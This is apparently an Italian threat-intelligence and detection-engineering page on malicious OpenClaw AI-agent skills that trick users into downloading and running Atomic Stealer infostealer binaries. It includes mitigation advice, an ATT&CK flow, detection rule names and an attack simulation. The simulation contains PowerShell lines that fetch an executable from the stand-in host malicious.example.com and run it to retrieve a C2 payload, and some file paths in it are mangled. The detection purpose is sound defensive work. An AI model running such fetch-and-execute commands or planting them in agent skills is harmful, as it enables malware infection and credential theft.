Da Automazione a Infezione: Come le Abilità degli Agenti AI di OpenClaw Vengono Armai
Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
L’articolo spiega come le abilità malevole OpenClaw vengano utilizzate come meccanismo di distribuzione di malware per gli utenti della piattaforma di agenti AI self-hosted. Gli attori delle minacce pubblicano abilità che sembrano innocue ma che alla fine guidano le vittime a scaricare ed eseguire binari controllati dagli attaccanti da fonti esterne. I payload osservati includono eseguibili Windows e file Mach-O di macOS che sono stati identificati come varianti della famiglia di infostealer Atomic Stealer. Questa attività introduce un rischio pratico per la catena di fornitura per le postazioni personali e gli sviluppatori che si basano su abilità fornite dalla comunità.
Indagine
VirusTotal Code Insight ha esaminato oltre tremila abilità OpenClaw e ha individuato centinaia che mostravano comportamenti malevoli o ad alto rischio. In un esempio, un’abilità caricata da hightower6eu forniva istruzioni passo passo per scaricare un archivio ZIP protetto da password da GitHub (password: openclaw) ed eseguire openclaw-agent.exe su Windows. Su macOS, la stessa abilità indirizzava gli utenti a recuperare uno script codificato in Base64 da glot.io, che successivamente scaricava un eseguibile Mach-O per l’esecuzione. I binari risultanti sono stati rilevati da diversi motori di sicurezza come infostealer trojanizzati.
Mitigazione
Trattate i repository di abilità come codice non attendibile ed eseguite OpenClaw in un ambiente sandbox o strettamente delimitato. Evitate di incollare comandi dalle descrizioni delle abilità e non eseguite binari recuperati da link esterni non verificati. Per operatori di marketplace e comunità, implementare una scansione al momento della pubblicazione che si concentri sul comportamento di download remoto, logica degli script offuscata e indicatori di furto di credenziali o esfiltrazione di dati. In ambienti aziendali, educate gli utenti sui rischi di installare abilità costruite dalla comunità e richiedete una revisione prima dell’uso.
Risposta
Caccia ai pacchetti di abilità OpenClaw che fanno riferimento a URL esterni di download, archivi protetti da password o stager di comandi codificati. Segnalate l’esecuzione di binari sconosciuti chiamati openclaw-agent.exe e i lanci sospetti di Mach-O che seguono un’attività di download scriptata. Bloccare la connettività a domini maliziosi noti e isolare i sistemi colpiti per una triage forense per confermare se l’esecuzione dell’infostealer e l’esposizione delle credenziali sono avvenute.
“graph TB %% Class definitions section classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ffcc99 %% Technique nodes tech_software_extensions[“<b>Tecnica</b> – T1176 Estensioni Software<br/><b>Descrizione</b>: L’avversario pubblica estensioni o pacchetti malevoli in un marketplace per camuffare il malware come funzionalità legittima.”] class tech_software_extensions technique tech_user_execution[“<b>Tecnica</b> – T1204.002 Esecuzione Utente: File Malevolo<br/><b>Descrizione</b>: La vittima viene ingannata a eseguire un file malevolo che scarica ed esegue payload aggiuntivi.”] class tech_user_execution technique tech_embedded_payloads[“<b>Tecnica</b> – T1027.009 Payload Incorporati<br/><b>Descrizione</b>: Il codice malevolo è nascosto all’interno di altri file o script per evitare la rilevazione.”] class tech_embedded_payloads technique tech_polymorphic_code[“<b>Tecnica</b> – T1027.014 Codice Polimorfico<br/><b>Descrizione</b>: Il codice muta il suo aspetto mantenendo la funzionalità per bypassare le difese.”] class tech_polymorphic_code technique tech_decode[“<b>Tecnica</b> – T1140 Deoffuscare/Decodificare File o Informazioni<br/><b>Descrizione</b>: La vittima decodifica o decripta payload offuscati prima dell’esecuzione.”] class tech_decode technique tech_content_injection[“<b>Tecnica</b> – T1659 Iniezione di Contenuto<br/><b>Descrizione</b>: L’avversario inietta contenuti malevoli come link di download o script in un flusso di lavoro legittimo.”] class tech_content_injection technique %% Malware / payload nodes malware_infostealer[“<b>Malware</b> – Trojan Infostealer<br/><b>Descrizione</b>: Raccoglie credenziali, cronologia di navigazione e altri dati sensibili dal sistema vittima.”] class malware_infostealer malware %% Process nodes proc_download_execute[“<b>Processo</b> – Scarica ed Esegui Binario Esterno<br/><b>Descrizione</b>: I comandi recuperati dall’abilità scaricano binari aggiuntivi e li lanciano.”] class proc_download_execute process proc_decode_execute[“<b>Processo</b> – Decodifica ed Esecuzione Payload<br/><b>Descrizione</b>: Script codificato in Base64u2011 è decodificato e il trojan risultante viene eseguito.”] class proc_decode_execute process %% Connections showing attack flow tech_software_extensions u002du002d>|porta_a| tech_user_execution tech_user_execution u002du002d>|attiva| proc_download_execute proc_download_execute u002du002d>|contiene| tech_embedded_payloads proc_download_execute u002du002d>|contiene| tech_polymorphic_code proc_download_execute u002du002d>|abilita| tech_decode tech_decode u002du002d>|facilita| proc_decode_execute proc_decode_execute u002du002d>|esegue| malware_infostealer malware_infostealer u002du002d>|abilita| tech_content_injection “
Flusso d’Attacco
Rilevamenti
Possibile Manipolazione di Stringhe Codificate in Base64 [MacOS] (tramite cmdline)
Visualizza
Tentativo di Esecuzione Curl Sospetto [MacOS] (tramite cmdline)
Visualizza
Attributi della Cartella Temp Xattr di MacOS Sono Stati Eliminati (tramite process_creation)
Visualizza
Possibile Infiltrazione di Dati / Esfiltrazione / C2 tramite Servizi / Strumenti di Terze Parti (tramite proxy)
Visualizza
Possibile Infiltrazione di Dati / Esfiltrazione / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns)
Visualizza
IOC (HashSha256) per rilevare: Da Automazione a Infezione: Come le Abilità degli Agenti AI OpenClaw Vengono Armatizzate
Visualizza
Esecuzione di Payload Malevoli tramite Abilità OpenClaw [Creazione di Processi su Linux]
Visualizza
Rilevamento dell’Esecuzione di Agent OpenClaw Malevoli [Creazione di Processi su Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere passato.
Razionale: Questa sezione detaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa e Comandi di Attacco:
Un attaccante ha ottenuto l’accesso iniziale ad una postazione vittima e deposita il binario malevoloopenclaw-agent.exenella directory temporanea dell’utente. Il binario viene eseguito con una riga di comando che contiene esplicitamente le parole chiavescaricaandeseguiper recuperare payload aggiuntivi da un server C2 non attendibile e eseguirli in memoria. L’attaccante utilizza un prompt dei comandi standard di Windows per evitare rilevamenti specifici di PowerShell, corrispondendo così alle aspettative della regola Sigma.- Rilascia il payload:
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Esegui con argomenti sospetti:
"%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute - L’agente contatta il server C2, scarica
payload.bin, lo scrive su disco e lo lancia, mentre la riga di comando del processo originale contiene ancora le parole chiave di attivazione.
- Rilascia il payload:
-
Script di Test di Regressione:
# ----------------------------------------------------------------------- # Simulazione di Esecuzione dell'Agente OpenClaw – attiva il rilevamento Sigma # ----------------------------------------------------------------------- # 1. Scarica l'agente malevolo (simulato con un file innocuo) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # file innocuo di placeholder $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Esegui l'agente con le parole chiave della riga di comando attese $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute" Write-Host "Esecuzione: $cmd" Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait # 3. Opzionale: Simula il download del payload (stub innocuo) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulazione completata. Verifica il SIEM per il rilevamento." -
Comandi di Pulizia:
# Rimuovi tutti gli artefatti creati durante la simulazione $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Eliminato $p" } }